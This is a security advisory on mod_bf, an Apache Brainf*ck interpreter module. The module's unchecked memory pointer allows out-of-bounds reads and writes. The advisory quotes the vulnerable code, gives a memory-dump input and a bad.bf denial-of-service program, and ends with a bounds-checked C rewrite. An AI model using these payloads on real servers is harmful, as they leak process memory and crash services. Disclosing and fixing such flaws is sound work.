mod_bf is a Brainf*ck interpreter module for the Apache web server: it executes .bf files served from the document tree (Brainf*ck is a very simple, low-level language of eight single-character commands that allows creation of fast-running code snippets). A security vulnerability in the product allows remote attackers to execute arbitrary code: the interpreter's memory pointer is never bounds-checked, so a .bf program can read and write memory outside the module's internal buffer.
Credit:
The information has been provided by Gobbles.
Vulnerable systems:
mod_bf version 0.1 under FreeBSD ports
mod_bf version 0.2
Relevant code fragment from mod_bf.c:
#define ARR_SIZE 100
static char a[ARR_SIZE];        /* the interpreter's entire memory: 100 bytes */
static int p;                   /* memory pointer: index into a[], never bounds-checked */
...
static int bf_handler(request_rec *r)
{
    ...
    memset (a, 0, ARR_SIZE);
    p = 0;
    ...
    if (!r->header_only)
        interpret (c);          /* c: the program text being interpreted */
    ...
}

/* req, used below, is the module's request pointer; its declaration and
 * assignment are in the parts of mod_bf.c elided from this fragment. */
static void interpret(char *c)
{
    int b;
    char *d;

    for (; *c; c++) {
        switch (*c) {
        case DEBUG_PR:          /* debugging aid: dump the first ten cells and p */
            for (b = 0; b < 10; b++)
                ap_rprintf (req, "a[%d]: %d" CRLF, b, a[b]);
            ap_rprintf (req, "a[p]: %d p: %d" CRLF, a[p], p);
            ap_rflush (req);
            ap_reset_timeout (req);
            break;
        case '+':
            a[p]++;             /* a[p] is written with whatever p holds */
            break;
        case '-':
            a[p]--;
            break;
        case '>':
            p++;                /* no check against ARR_SIZE */
            break;
        case '<':
            p--;                /* no check against 0: p can go negative */
            break;
        case '.':               /* write the byte at a[p] into the HTTP response */
            if (ap_rputc (a[p], req) == EOF)
                return;
            ap_rflush (req);
            ap_reset_timeout (req);
            break;
        case ',':               /* read one byte of the query string into a[p] */
            if ((a[p] = *req->args) == EOF || a[p] == CR)
                a[p] = 0;
            req->args++;
            ap_reset_timeout (req);
            break;
        case '[':
            /* the idea of the following is borrowed from bfi:
             * find the matching ']', temporarily NUL-terminate the loop
             * body there and interpret it recursively while a[p] != 0 */
            d = ++c;
            for (b = 1; b && *c; c++)
                b += (*c == '[' ? 1 : (*c == ']' ? -1 : 0));
            if (!b) {
                *--c = 0;
                while (a[p])
                    interpret (d);
                *c = ']';
            }
            break;
        }
    }
}
a[] is a static array of 100 bytes: the interpreter's entire memory. p is an int index into it. '>' increments p, '<' decrements it, and '+' and '-' modify the byte at a[p]. Nothing in interpret() checks that p stays within 0..ARR_SIZE-1.
An attacker therefore only needs a run of '>' characters to push p to 100 or beyond, or a run of '<' to make it negative; after that, '+' and '-' let him set the byte at a[p], which lies outside the array, to any value he wants, one increment at a time. Because a[] has static storage, the bytes being overwritten belong to the module's own data, and depending on how the compiler lays out the statics they may include p itself, which is declared immediately after a[].
Further, an attacker can dump the memory that lies in front of a[] with the '.' command: each '<' moves p one byte before the start of the array and each '.' writes the byte at a[p] into the HTTP response. For example:
<.<.<.<.<.<.<.<.
DoS example: the following program walks p past the end of a[] with a run of about a hundred '>' and then stores a 1 into every subsequent byte with repeated '+>' pairs, corrupting whatever follows a[] in the module's memory until the serving process crashes. The file is placed in the attacker's public_html directory and requested over HTTP:
$ cat > ~GOBBLES/public_html/bad.bf
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>
+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+
>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>
+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+
>+>+>
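As an added example (not code from mod_bf or from the advisory), here is what a bounds-checked counterpart of interpret() looks like: a stand-alone C interpreter for the same eight commands over a 100-byte tape that refuses any '>' or '<' which would take p outside a[], rejects unmatched brackets up front instead of splicing NULs into the program text, and stops runaway loops with a step budget so a program like bad.bf cannot tie up the serving process. All names (bf_vm, bf_run, bf_eval, bf_move_right), the step limit and the sample programs are this example's own assumptions, not part of mod_bf.

```c
#include <stddef.h>
#include <string.h>

#define ARR_SIZE 100   /* same tape size as mod_bf's static char a[ARR_SIZE] */
#define MAX_PROG 4096  /* cap on program length; also sizes the bracket stack */
#define MAX_OUT  256

/* BOUNDS: '>'/'<' would leave a[0..ARR_SIZE-1]; BRACKET: unmatched '[' or ']';
 * TOOLONG: program longer than MAX_PROG; STEPS: step budget exhausted. */
enum bf_status { BF_OK = 0, BF_ERR_BOUNDS, BF_ERR_BRACKET, BF_ERR_TOOLONG, BF_ERR_STEPS };

struct bf_vm {
    unsigned char a[ARR_SIZE];
    size_t p;            /* invariant: p < ARR_SIZE whenever a[p] is touched */
    char out[MAX_OUT];
    size_t outlen;
    const char *in;      /* input consumed by ','; exhausted input reads as 0 */
};

/* Fill jump[i] with the index of the bracket matching prog[i]. */
static int bf_match_brackets(const char *prog, size_t n, size_t *jump)
{
    size_t stack[MAX_PROG], sp = 0, i;

    for (i = 0; i < n; i++) {
        if (prog[i] == '[') {
            stack[sp++] = i;
        } else if (prog[i] == ']') {
            if (sp == 0)
                return BF_ERR_BRACKET;       /* ']' without an opening '[' */
            jump[i] = stack[--sp];
            jump[jump[i]] = i;
        }
    }
    return sp == 0 ? BF_OK : BF_ERR_BRACKET; /* some '[' was never closed */
}

static int bf_run(struct bf_vm *vm, const char *prog, unsigned long step_limit)
{
    size_t jump[MAX_PROG], n = strlen(prog), pc;
    unsigned long steps = 0;
    int st;

    if (n > MAX_PROG)
        return BF_ERR_TOOLONG;
    if ((st = bf_match_brackets(prog, n, jump)) != BF_OK)
        return st;

    for (pc = 0; pc < n; pc++) {
        if (++steps > step_limit)
            return BF_ERR_STEPS;
        switch (prog[pc]) {
        case '>':   /* mod_bf does p++ unconditionally; refuse to leave the tape */
            if (vm->p + 1 >= ARR_SIZE)
                return BF_ERR_BOUNDS;
            vm->p++;
            break;
        case '<':   /* mod_bf does p--; a negative p reads/writes before a[0] */
            if (vm->p == 0)
                return BF_ERR_BOUNDS;
            vm->p--;
            break;
        case '+': vm->a[vm->p]++; break;
        case '-': vm->a[vm->p]--; break;
        case '.':
            if (vm->outlen + 1 < MAX_OUT)    /* the output buffer is bounded too */
                vm->out[vm->outlen++] = (char)vm->a[vm->p];
            break;
        case ',':
            vm->a[vm->p] = (vm->in && *vm->in) ? (unsigned char)*vm->in++ : 0;
            break;
        case '[':
            if (vm->a[vm->p] == 0)
                pc = jump[pc];   /* skip the loop body */
            break;
        case ']':
            if (vm->a[vm->p] != 0)
                pc = jump[pc];   /* back to the matching '[' */
            break;
        default:
            break;               /* any other byte is a comment */
        }
    }
    return BF_OK;
}

/* Run prog on a fresh VM with the given (constructed) input; copy output to out. */
static int bf_eval(const char *prog, const char *input, char *out, size_t outsz)
{
    struct bf_vm vm;
    int st;

    memset(&vm, 0, sizeof vm);
    vm.in = input;
    st = bf_run(&vm, prog, 1000000UL);   /* step budget is an assumed policy value */
    vm.out[vm.outlen] = '\0';            /* outlen < MAX_OUT by construction */
    if (out && outsz) {
        strncpy(out, vm.out, outsz - 1);
        out[outsz - 1] = '\0';
    }
    return st;
}

/* 1 if prog runs to completion and prints exactly expect. */
static int bf_outputs(const char *prog, const char *input, const char *expect)
{
    char out[MAX_OUT];
    return bf_eval(prog, input, out, sizeof out) == BF_OK && strcmp(out, expect) == 0;
}

/* Status of a program of n consecutive '>' starting from p == 0, i.e. the
 * opening of bad.bf above: 99 moves are legal, the 100th is refused. */
static int bf_move_right(size_t n)
{
    char prog[MAX_PROG + 1];
    if (n > MAX_PROG)
        return BF_ERR_TOOLONG;
    memset(prog, '>', n);
    prog[n] = '\0';
    return bf_eval(prog, "", NULL, 0);
}
```

With these checks, the memory-dump idiom `<.` returns BF_ERR_BOUNDS before a single byte outside a[] is read, and bad.bf is rejected at its hundredth '>' rather than being allowed to write past the array. Matching brackets once with a jump table, instead of mod_bf's recursive NUL-splicing, also keeps the program text read-only and makes an unclosed '[' an error instead of something silently skipped.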